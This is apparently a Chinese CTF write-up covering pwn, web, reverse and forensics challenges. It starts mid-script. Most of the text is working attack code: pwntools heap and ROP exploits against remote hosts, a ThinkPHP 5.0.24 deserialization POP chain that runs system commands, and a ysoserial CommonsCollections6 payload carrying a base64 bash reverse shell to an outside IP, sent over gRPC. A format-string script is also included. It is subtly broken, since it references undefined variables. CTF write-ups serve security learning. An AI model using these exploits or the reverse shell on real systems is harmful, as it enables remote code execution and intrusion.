        p.sendlineafter('Enter username to switch to: ',username)

def read():
        p.sendlineafter('listuser, exit): ','read')

def message(username, size, content):
        p.sendlineafter('listuser, exit): ','message')
        p.sendlineafter('To: ',str(username))
        p.sendlineafter('Message size: ',str(size))
        p.sendafter('Content: ',content)

def duan():
        gdb.attach(p)
        pause()

#================ leak the libc ===============#
#================ leak heap base ================#
sla('Enter new username: ', b'k')
message('k',0x460,'hello')
message('k',0x20,'hello')
message('k',0x20,'hello')
delete('k')
read()
#duan()
ru(b'k -> k: ')
libc_base=u64(p.recvuntil("\x7f")[-6:].ljust(8, b"\x00"))-0x3ebca0
ru(b'k -> k: ')
ru(b'k -> k: ')
heap_base=u64(r(6).ljust(8, b'\x00'))-0x1a880
lg('libc_base')
lg('heap_base')

#================ prepare to set up the rop ===============#

free_hook=libc_base+libc.sym['__free_hook']
system=libc_base+libc.sym['system'] 
og=[0x4f2a5,0x4f302,0x10a2fc]

#==========================================================#
add('k')
add('aaaa')
add('bbbb')
add('cccc')
for i in range(7):
    message('k',0x20,'k')
delete('k')
for i in range(5):
        message('dead',0x20,'k')
switch('aaaa')
for i in range(5):
        message('aaaa',0x20,'k')
switch('bbbb')
for i in range(7):
    message('bbbb',0x20,'k')
delete('bbbb')
delete('aaaa')
message('dead',0x30,'k')
for i in range(7):
        message('cccc',0x20,'/bin/sh\x00')
message('cccc',0x20,p64(free_hook))
for i in range(2):
        message('cccc',0x20,'/bin/sh\x00')
message('cccc',0x20,p64(system))
delete('cccc')
#duan()
itr()

simpleinterpreter

import os
import sys
import time
from pwn import *
from ctypes import *

context.os = 'linux'
context.log_level = "debug"
context.arch = 'amd64'

p=remote('101.200.122.251',13410)

#==================================================#

s       = lambda data               :p.send(data)
sa      = lambda text, data         :p.sendafter(text, data)
sl      = lambda data               :p.sendline(data)
sla     = lambda text, data         :p.sendlineafter(text, data)
r       = lambda num                :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4, b"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8, b"\x00"))
lg      = lambda s                  :p.success('\033[32m%s -> 0x%x\033[0m' % (s, eval(s)))
lgl     = lambda s, value           :p.success('\033[32m%s -> 0x%x\033[0m' % (s, value))
itr     = lambda                    :p.interactive()

#==================================================#

#p=process("./simpleinterpreter")
ru("Code size:")

code="""
#include <stdio.h>
#include <stdlib.h>

int main() {
    int *a1, *a2, *a3, *a4, *a5, *a6, *a7, *a8, *a9, *a10;
    int libc_base, free_hook, system, bin_sh;

    a3 = malloc(0x100);
    a4 = malloc(0x100);
    a5 = malloc(0x100);
    a6 = malloc(0x100);
    a7 = malloc(0x100);
    a8 = malloc(0x100);
    a9 = malloc(0x100);
    a10 = malloc(0x100);

    malloc(0x10);

    free(a3);
    free(a4);
    free(a5);
    free(a6);
    free(a7);
    free(a8);
    free(a9);
    free(a10);

    libc_base = *a10 - 0x3ebca0;
    printf("Libc Base: %p\n", libc_base);

    free_hook = libc_base + 0x3ed8e8;
    system = libc_base + 0x4f420;
    bin_sh = libc_base + 0x1b3d88;

    a1 = malloc(0x40);
    a2 = malloc(0x40);
    free(a1);
    free(a2);

    *a2 = free_hook;

    a1 = malloc(0x40);
    a2 = malloc(0x40);
    *a2 = system;

    free((void *)bin_sh);
    return 0;
}
"""

sl(str(len(code)))
ru("Please give me the code to interpret:")
sl(code)
itr()

warmup23

import os
import sys
import time
from pwn import *
from ctypes import *

context.os = 'linux'
context.log_level = "debug"
context.arch = 'amd64'

p = remote('120.24.69.11',12700)
elf = ELF('./warmup')
libc = ELF('./libc.so.6')

#==================================================#

s       = lambda data               :p.send(data)
sa      = lambda text, data         :p.sendafter(text, data)
sl      = lambda data               :p.sendline(data)
sla     = lambda text, data         :p.sendlineafter(text, data)
r       = lambda num                :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4, b"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8, b"\x00"))
lg      = lambda s                  :p.success('\033[32m%s -> 0x%x\033[0m' % (s, eval(s)))
lgl     = lambda s, value           :p.success('\033[32m%s -> 0x%x\033[0m' % (s, value))
itr     = lambda                    :p.interactive()

#==================================================#

add_idx = 1
show_idx = 2
delete_idx = 3

def add(size, content):
    sla('>> ', b'1')
    sla('Size: ', str(size))
    sa('Note: ', content)

def show(idx):
    sla('>> ', b'2')
    sla('Index: ', str(idx))

def delete(idx):
    sla('>> ', b'3')
    sla('Index: ', str(idx))

def duan():
    gdb.attach(p)
    pause()

#==================================================#

add(0x6d48, b'aaaa')   
add(0x508, b'aaaa')  
add(0x68, b'aaaa')   
add(0x88, b'bbbb')  
add(0x88, b'bbbb')  
add(0x108, b'aaaa')   
add(0x108, b'aaaa')   
add(0x4f8, b'kkkk')   
add(0x18, b'aaaa')  
add(0x4f8, b'kkkk')  
add(0x18, b'aaaa')  
add(0x518, b'bbbb')   
add(0x18, b'aaaa')   
delete(9)
delete(11)
delete(1)
add(0x1000, b'aaaa')  
pl=flat(0, b'\xb1\x08\x00\x00\x00\x00')
add(0x508, pl)  
add(0x518, b'\x10')  
add(0x4f8, b'aaaa')  
delete(13)
delete(7)
pl=flat(0, b'\x10')
add(0x4f8, pl)   
add(0x4f8, b'aaaa')   
delete(6)
pl=b'\x00' * 0x100 + p64(0x8b0)
add(0x108, pl)   
delete(13)

#================ leak the libc ===============#

add(0x4f8, b'aaaa')   
show(2)
libc_base = uu64() - 0x219ce0
lg('libc_base')

#================ leak heap base ================#

add(0x18, b'aaaa')   
delete(14)
show(2)
ru('Note: ')
key = u64(r(5).ljust(8, b'\x00'))
lg('key')
heap_base = (key << 12) - 0x7000
lg('heap_base')

#================ prepare to set up the rop ===============#

IO_2_1_stdout = libc_base + libc.sym['_IO_2_1_stdout_']
environ = libc_base + libc.sym['environ']
open_addr = libc_base + libc.sym['open']
read_addr = libc_base + libc.sym['read']
write_addr = libc_base + libc.sym['write']

rdi=libc_base + 0x000000000002a3e5
rsi=libc_base + 0x000000000002be51
rdx=libc_base + 0x00000000000796a2
rax=libc_base + 0x0000000000045eb0
#syscall = libc_base + libc.sym['syscall']
syscall = libc_base + 0x0000000000091316

#================ leak heap stack================#

delete(4)
delete(3)
pl = b'\x00' * 0x48 + p64(0x91) + p64(IO_2_1_stdout ^ key)
add(0x98, pl)
add(0x88, b'bbbb')  
pl = flat(0xfbad1800, 0 , 0 , 0 , environ, environ + 8)
add(0x88, pl)
stack = uu64()
lg('stack')

delete(6)
delete(5)
pl=b'\x00' * 0xc8 + p64(0x111) + p64((stack - 0x148) ^ key)
add(0x128, pl)
add(0x108, b'bbbb')

#================ prepare to set up the orw ===============#

flag_addr = stack - 0x148
target = heap_base + 0x100
pl = b'./flag\x00\x00'
pl += p64(rdi) + p64(flag_addr)
pl += p64(rsi) + p64(0)
pl += p64(rdx) + p64(0)
pl += p64(rax) + p64(2)
pl += p64(syscall)
pl += p64(rdi) + p64(3)
pl += p64(rsi) + p64(target)
pl += p64(rdx) + p64(0x50)
pl += p64(rax) + p64(0)
pl += p64(syscall)
pl += p64(rdi) + p64(1)
pl += p64(rsi) + p64(target)
pl += p64(rdx) + p64(0x50)
pl += p64(rax) + p64(1)
pl += p64(syscall)
add(0x108, pl)

itr()

WEB

thinkshop

先进入网站,发现是一个购买flag的页面,也没啥特别的地方,随便输一个域名,发现为thinkphp V5.0.23

然后去扫一下目录,找到了/application和/vendor,熟悉tp框架MVC的可以想到去/application里找相关的页面源码

拿到附件,docker运行一把,拷贝下目录做代审

先试了下v5.0.23的poc,发现没用

再试试v5.0.24的poc,参考下文:

https://atmujie.github.io/2021/10/03/%E9%80%9A%E8%BF%87revengephp%E7%90%86%E8%A7%A3thinkphp%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%93%BE/#toc-heading-6

审计源码:在html\application\index\model\goods.php中找到了一个反序列化的参数

再根据得到的目录进去找到一个后台登录页面/public/index.php/index/admin/login.html

此处写的是通过匹配主键id 来进行匹配登陆的 所以 1 123456 进行登陆

可以修改,进去抓个包

每一个能修改的行和下面post传的参对应,找到update.php的更新部分

此处insert into KEY VALUES $value,原本在网页上改是修改value,而本题是要修改data,源码是data as key,所以把value注释掉,去修改data

先根据上面的文章把pop链构造好,给出poc:

<?php
//class Request 执行终点
namespace think;
class Request{
    protected $filter;
    protected $get = ['atmujie'=>'cat /fffflllaaaagggg'];
    public function __construct()
    {
        $this->filter = "system";
    }
}

//abstract class Driver{} Memcache父类
namespace think\cache;
use think\Request;
abstract class Driver{
    protected $handler;
    protected $tag = "test";
    protected $options = ['prefix'=>'atmujie/'];
    public function __construct()
    {
        $this->handler = new Request();
    }
}

//class Memcache extends Driver 调向Request
namespace think\cache\driver;
use think\cache\Driver;
class Memcache extends Driver{}

//class Memcache extends SessionHandler 调向上面Memcache类的set方法
namespace think\session\driver;
use SessionHandler;
class Memcache extends SessionHandler{
    protected $handler;
    public function __construct()
    {
        $this->handler = new \think\cache\driver\Memcache();
    }
}

//class Output
namespace think\console;
use think\session\driver\Memcache;
class Output{
    private $handle;
    protected $styles = ['getAttr'];
    public function __construct()
    {
        $this->handle = new Memcache();
    }
}

// TODO 断点
//class Query 指向Output
namespace think\db;
use think\console\Output;
class Query{
    protected $model;
    public function __construct()
    {
        $this->model = new Output();
    }
}

//abstract class Relation
namespace think\model;
use think\db\Query;
abstract class Relation{
    protected $query;
    public function __construct()
    {
        $this->query = new Query();
    }
}

//abstract class OneToOne extends Relation
namespace think\model\relation;
use think\model\Relation;
use think\db\exception\ModelNotFoundException;
abstract class OneToOne extends Relation {
    protected $query;//去进行触发下一条链
    protected $bindAttr = [];
    public function __construct()
    {
        parent::__construct();
        $this->query = new ModelNotFoundException();
        // $this->bindAttr = ["no","123"];
        $this->bindAttr = ["test"=>"test"];
    }
}

namespace think\db\exception;
use think\console\Output;
class ModelNotFoundException
{

    protected $model;
    public  function __construct()
    {
        $this->model=new Output();
    }
}

//class BelongsTo extends OneToOne
namespace think\model\relation;
class BelongsTo extends OneToOne{}

//abstract class Model 指向Output类__call()
namespace think;
use think\console\Output;
use think\model\relation\BelongsTo;
abstract class Model{
    protected $error;
    protected $append = [];
    protected $parent;
    public function __construct()
    {
            $this->append =['getError'];
            $this->error = new BelongsTo();
            $this->parent = new Output();
    }
}

//class Pivot extends Model 继承Model,通过此类调用进Model
namespace think\model;
use think\Model;
class Pivot extends Model{}

//abstract class Pipes Windows继承类
namespace think\process\pipes;
abstract class Pipes{}

//class Windows extends Pipes 起点类 指向Pivot类
namespace think\process\pipes;
use think\model\Pivot;
class Windows extends Pipes{
    private $files = [];
    public function __construct()
    {
        $this->files = [new Pivot()];
    }
}

namespace think\process\pipes;
$a = array(0=>new Windows());
echo base64_encode(serialize($a));
?>

生成注入参数,抓包注入,发现修改成功

比赛结束了,忘记截图了,用了自己docker起的

happygame

Nc 之后啥也看不出来,就返回仨问号,把返回的内容搞出来看一下十六进制,发现如下内容

扔到github上搜

发现是一个 grpc 的报错内容,

查看文档发现需要用 grpcurl 访问,然后用法上就看 help 结合 不断拷打 gpt,得到大概如下一些内容:

root@sp4c1ous:/mnt/e/GoogleDownload/grpcurl_1.8.9_linux_x86_64# ./grpcurl -plaintext 8.147.129.191:18752 list
grpc.reflection.v1alpha.ServerReflection
helloworld.Greeter

root@sp4c1ous:/mnt/e/GoogleDownload/grpcurl_1.8.9_linux_x86_64# ./grpcurl -plaintext 8.147.129.191:18752 describe helloworld.Greeter
helloworld.Greeter is a service:
service Greeter {
  rpc ProcessMsg ( .helloworld.Request ) returns ( .helloworld.Reply );
  rpc SayHello ( .helloworld.HelloRequest ) returns ( .helloworld.HelloReply );
}

root@sp4c1ous:/mnt/e/GoogleDownload/grpcurl_1.8.9_linux_x86_64# ./grpcurl -plaintext 8.147.129.191:18752 describe helloworld.Greeter.ProcessMsg
helloworld.Greeter.ProcessMsg is a method:
rpc ProcessMsg ( .helloworld.Request ) returns ( .helloworld.Reply );

root@sp4c1ous:/mnt/e/GoogleDownload/grpcurl_1.8.9_linux_x86_64# ./grpcurl -plaintext 8.147.129.191:18752 describe helloworld.Request
helloworld.Request is a message:
message Request {
  bytes serializeData = 1;
}

可以看到这里给出了一个 serializeData,实际上也就是参数内容,结合对之前 grpc 项目的简单翻阅,grpc 没有查看依赖库的功能,猜测这里就是盲打反序列化了,ysoserial 乱生成些链子打

最后CC6可以RCE

root@sp4c1ous:/mnt/d/tools/Web tools/ysoserial-master# java -jar ./ysoserial.jar CommonsCollections6 "bash -c {echo,YmFz
aCAtaSA+JiAvZGV2L3RjcC80Ny4xMDQuMTQuMTYwLzIzMzMgMD4mMQ==}|{base64,-d}|{bash,-i}"|base64
rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRv
cmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznB
H9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4
cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSC
nnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5z
Zm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFp
bmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUv
Y29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9u
cy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABXNyADtvcmcuYXBhY2hl
LmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGU
AgABTAAJaUNvbnN0YW50cQB+AAN4cHZyABFqYXZhLmxhbmcuUnVudGltZQAAAAAAAAAAAAAAeHBz
cgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zv
cm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5h
bWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNz
O3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAnQACmdldFJ1bnRpbWV1
cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAB0AAlnZXRNZXRob2R1cQB+ABsA
AAACdnIAEGphdmEubGFuZy5TdHJpbmeg8KQ4ejuzQgIAAHhwdnEAfgAbc3EAfgATdXEAfgAYAAAA
AnB1cQB+ABgAAAAAdAAGaW52b2tldXEAfgAbAAAAAnZyABBqYXZhLmxhbmcuT2JqZWN0AAAAAAAA
AAAAAAB4cHZxAH4AGHNxAH4AE3VyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAA
AAF0AGFiYXNoIC1jIHtlY2hvLFltRnphQ0F0YVNBK0ppQXZaR1YyTDNSamNDODBOeTR4TURRdU1U
UXVNVFl3THpJek16TWdNRDRtTVE9PX18e2Jhc2U2NCwtZH18e2Jhc2gsLWl9dAAEZXhlY3VxAH4A
GwAAAAFxAH4AIHNxAH4AD3NyABFqYXZhLmxhbmcuSW50ZWdlchLioKT3gYc4AgABSQAFdmFsdWV4
cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAABc3IAEWphdmEudXRpbC5IYXNoTWFw
BQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAAAHcIAAAAEAAAAAB4
eHg=

root@sp4c1ous:/mnt/e/GoogleDownload/grpcurl_1.8.9_linux_x86_64# ./grpcurl -d '{"serializeData": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaFNldLpEhZWWuLc0AwAAeHB3DAAAAAI/QAAAAAAAAXNyADRvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMua2V5dmFsdWUuVGllZE1hcEVudHJ5iq3SmznBH9sCAAJMAANrZXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANtYXB0AA9MamF2YS91dGlsL01hcDt4cHQAA2Zvb3NyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABXNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB+AAN4cHZyABFqYXZhLmxhbmcuUnVudGltZQAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAnQACmdldFJ1bnRpbWV1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAB0AAlnZXRNZXRob2R1cQB+ABsAAAACdnIAEGphdmEubGFuZy5TdHJpbmeg8KQ4ejuzQgIAAHhwdnEAfgAbc3EAfgATdXEAfgAYAAAAAnB1cQB+ABgAAAAAdAAGaW52b2tldXEAfgAbAAAAAnZyABBqYXZhLmxhbmcuT2JqZWN0AAAAAAAAAAAAAAB4cHZxAH4AGHNxAH4AE3VyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0AGFiYXNoIC1jIHtlY2hvLFltRnphQ0F0YVNBK0ppQXZaR1YyTDNSamNDODBOeTR4TURRdU1UUXVNVFl3THpJek16TWdNRDRtTVE9PX18e2Jhc2U2NCwtZH18e2Jhc2gsLWl9dAAEZXhlY3VxAH4AGwAAAAFxAH4AIHNxAH4AD3NyABFqYXZhLmxhbmcuSW50ZWdlchLioKT3gYc4AgABSQAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAABc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAAAHcIAAAAEAAAAAB4eHg="}' -plaintext 8.147.129.191:18752 helloworld.Greeter.ProcessMsg
\{
  "message": "Hello World"
}

强网先锋

石头剪刀布

朴素贝叶斯模型

def train_model(X_train, y_train):
    model = MultinomialNB()
    model.fit(X_train, y_train)
    return model

def predict_opponent_choice(model, X_pred):
    return model.predict(X_pred)

def predict(i,my_choice):

    global  sequence
    model = None
    if i < 5:
        opponent_choice = [random.randint(0, 2)]
    else:
        model = train_model(X_train, y_train)
        opponent_choice = predict_opponent_choice(model, [sequence])

# ...Constructing a training set...#

    return opponent_choice

问了下GPT:

emm不会,决定人脑博弈:

ezre

原文件存在有反调试

去掉ollvm后

大体逻辑是多次base64在异或

存在反调试,可通过改eip绕过

动调得到各个base64表

l+USN4J5Rfj0TaVOcnzXiPGZIBpoAExuQtHyKD692hwmqe7/Mgk8v1sdCW3bYFLr
FGseVD3ibtHWR1czhLnUfJK6SEZ2OyPAIpQoqgY0w49u+7rad5CxljMXvNTBkm/8
Hc0xwuZmy3DpQnSgj2LhUtrlVvNYks+BX/MOoETaKqR4eb9WF8ICGzf6id1P75JA
pnHQwlAveo4DhGg1jE3SsIqJ2mrzxCiNb+Mf0YVd5L8c97/WkOTtuKFZyRBUPX6a
plxXOZtaiUneJIhk7qSYEjD1Km94o0FTu52VQgNL3vCBH8zsA/b+dycGPRMwWfr6

最后把处理后的表当作异或的key,动调出key

enc=[0x3A, 0x2C, 0x4B, 0x51, 0x68, 0x46, 0x59, 0x63, 0x24, 0x04, 
  0x5E, 0x5F, 0x00, 0x0C, 0x2B, 0x03, 0x29, 0x5C, 0x74, 0x70, 
  0x6A, 0x62, 0x7F, 0x3D, 0x2C, 0x4E, 0x6F, 0x13, 0x06, 0x0D, 
  0x06, 0x0C, 0x4D, 0x56, 0x0F, 0x28, 0x4D, 0x51, 0x76, 0x70, 
  0x2B, 0x05, 0x51, 0x68, 0x48, 0x55, 0x24, 0x19]

m=[0]*48

key=[25, 76, 22, 73, 110, 77, 74, 78, 16, 98, 22, 109, 16, 126, 78, 109, 76, 22, 73, 110, 77, 74, 78, 16, 98, 22, 109, 16, 126, 78, 109, 76, 22, 73, 110, 77, 74, 78, 16, 98, 22, 109, 16, 126, 78, 109, 76, 0]

for i in range(len(enc)):
    m[i]=(enc[i-1])^enc[i]^key[i]
m[0]=0x25^0x0e
print(bytes(m))
#b'+ZqSWcUtWBLlOriEfcajWBSRstLlkEfFWR7j/R7dMCDGnp=='

cyberchef解密

SpeedUp

https://oeis.org/A244060/b244060.txt

网上已经有2的27次方的阶乘的每一位数之和了0.0

这样的话就不用算自己去算了,直接跑一份sha256

Babyre

存在TLS会修改key和密文

#include <stdio.h>

void decrypt(unsigned int v[], unsigned char k[], unsigned char flag[]) {
    unsigned int v0 = v[0];
    unsigned int v1 = v[1];
    unsigned int delta = 0x77BF7F99;
    unsigned int sum1 = 0xd192c263;
    int i, j;

    for (j = 0; j < 4; j++) {
        for (i = 0; i < 33; i++) {
            sum1 += delta;
            v1 -= (v0 + ((v0 << 5) ^ (v0 >> 4))) ^ ((k[(sum1 >> 11) & 3]) + sum1);
            v0 -= (v1 + ((v1 << 5) ^ (v1 >> 4))) ^ (sum1 + (k[sum1 & 3])) ^ sum1;
        }
    }

    // Write v0 and v1 to flag array
    unsigned char* v0_bytes = (unsigned char*)&v0;
    unsigned char* v1_bytes = (unsigned char*)&v1;

    flag[0] = v0_bytes[0];
    flag[1] = v0_bytes[1];
    flag[2] = v0_bytes[2];
    flag[3] = v0_bytes[3];

    flag[4] = v1_bytes[0];
    flag[5] = v1_bytes[1];
    flag[6] = v1_bytes[2];
    flag[7] = v1_bytes[3];
}

int main() {
    unsigned char flag[17];
    unsigned int l[] = { 0x9523f2e0, 0x8ed8c293, 0x8668c393, 0xddf250bc, 0x510e4499, 0x8c60bd44, 0x34dcabf2, 0xc10fd260 };
    int i;
    unsigned char k[] = { 0x62, 0x6f, 0x6d, 0x62, 0 };

    for (i = 0; i < 4; i++) {
        unsigned int a[] = { l[2 * i], l[2 * i + 1] };
        decrypt(a, k, &flag[8 * i]);
    }

    printf("%s\n", flag);

    return 0;
}

ez_fmt

import os
import sys
import time
from pwn import *
from ctypes import *

#context.os = 'linux'
#context.log_level = "debug"

#context(os = 'linux',log_level = "debug",arch = 'amd64')
s       = lambda data               :p.send(str(data))
sa      = lambda delim,data         :p.sendafter(str(delim), str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))
r       = lambda num                :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
itr     = lambda                    :p.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
l64     = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,b"\x00"))
l32     = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,b"\x00"))
#context.terminal = ['gnome-terminal','-x','sh','-c']

elf = ELF('./pwn')
libc = ELF('./libc-2.31.so')

def duan():
        gdb.attach(p)
        pause()

while True:
        try:    
                p =remote('47.104.24.40',1337)
                ru("There is a gift for you ")
                stack = int(p.recv(14),16)
                pl = '%'+str(0xe6)+'c%11$hhn'
                pl += '%'+str(0x2b01-0xe6)+'c%10$hn'
                pl = pl.ljust(0x20,'\x00')
                pl += p64(buf+0x68)+p64(buf+0x68+2)
                sl(payload)
                sl('cat flag')
                itr()
        except:
                p.close()
                continue

'''
0xe3afe execve("/bin/sh", r15, r12)
constraints:
  [r15] == NULL || r15 == NULL
  [r12] == NULL || r12 == NULL

0xe3b01 execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL
  [rdx] == NULL || rdx == NULL

0xe3b04 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL

'''

Trie

import os
import sys
import time
from pwn import *
from ctypes import *

context.os = 'linux'
context.log_level = "debug"

#context(os = 'linux',log_level = "debug",arch = 'amd64')
s       = lambda data               :p.send(str(data))
sa      = lambda delim,data         :p.sendafter(str(delim), str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))
r       = lambda num                :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
itr     = lambda                    :p.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
l64     = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,b"\x00"))
l32     = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,b"\x00"))
context.terminal = ['gnome-terminal','-x','sh','-c']

x64_32 = 1

if x64_32:
        context.arch = 'amd64'
else:
        context.arch = 'i386'

#p = process("./pwn")
flag='flag'

def pwn(ip):
        p=remote("47.104.150.173", 1337)
        p.recvuntil('4. Quit.\n')
        p.sendline('1')
        p.recvuntil('Input destination IP:\n')
        p.sendline('0.0.0.0')
        p.recvuntil('Input the next hop:\n')
        p.sendline('10.10.10.10')
        p.recvuntil('4. Quit.\n')
        p.sendline('1')
        p.recvuntil('Input destination IP:\n')
        p.sendline('255.255.255.255')    
        p.recvuntil('Input the next hop:\n')
        p.sendline('10.10.10.10')
        p.recvuntil('4. Quit.\n')
        p.sendline('3')    
        p.recvuntil('4. Quit.\n')
        p.sendline('1')
        p.recvuntil('Input destination IP:\n')
        p.sendline(ip)
        p.recvuntil('Input the next hop:\n')
        p.sendline('10.10.10.10')
        p.recvuntil('4. Quit.\n')
        p.sendline('3')    
        p.recvuntil('4. Quit.\n')
        p.sendline('2')    
        p.recvuntil('Input destination IP:\n')
        p.sendline(ip)
        p.recvuntil('The next hop is ')

        message=p.recvuntil(b'\n\n')[:-2]
        success(message)

        ip=message.decode('utf-8').split('.')
        print(ip)
        for i in ip[::-1]:
                global flag
                flag+=chr(int(i, 10))
        p.close()

while True:
        for i in range(1, 9):
                bbb='1'*i+'0'*(8-i)
                aaa=str(int(bbb,2))+'.0.0.0'
                pwn(aaa)
                success(flag)
                sleep(0.4)

        for i in range(1, 9):
                bbb='1'*i+'0'*(8-i)
                aaa='0.'+str(int(bbb,2))+'.0.0'
                pwn(aaa)
                success(flag)
                sleep(0.4)

找到PNG了吗

Linux内存镜像,

vol3用的不熟,用2制作profile:

内核版本:Linux version 5.4.0-100-generic

https://treasure-house.randark.site/blog/2023-10-25-MemoryForensic-Test/

可以仿照这篇巨魔的文章做profile

做好之后,放到\volatility\plugins\overlays\linux​目录下,识别

识别到了已经

然后对镜像处理会有报错,按照上面文章提到的对dwarf.py和linux.py进行修改

https://github.com/volatilityfoundation/volatility/issues/828

https://github.com/volatilityfoundation/volatility/pull/852

https://github.com/volatilityfoundation/volatility/pull/852/commits/9ff9e9bb9103d63cbb278e991209aa11cffc61ce

成功识别

然后我们用 linux_enumerate_files​插件进行扫描

扫描出的文件可以输出到文本里,方便搜索:

发现一个特殊文件 /home/yuren/Desktop/have_your_fun.jocker

linux_find_file​进行提取文件,但是是0字节,应该是被删除了

批量搜一下这个 jocker​发现一个类似于脚本一样的东西,

#include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 #include <sys/socket.h>
 #include <arpa/inet.h>
 #include <unistd.h>
#define SERVER_IP "192.168.6.1"
 #define SERVER_PORT 110
 unsigned char buff[20000];
 void swap(char* a, char* b) {
     char temp = *a;
a = b;
b = temp;
 }
 void rc4_encrypt_decrypt(unsigned char key, unsigned char data, int data_length) {
     int i, j = 0, t;
     int s[256];
     int key_length = strlen((const char)key);
    for (i = 0; i < 256; i++) {
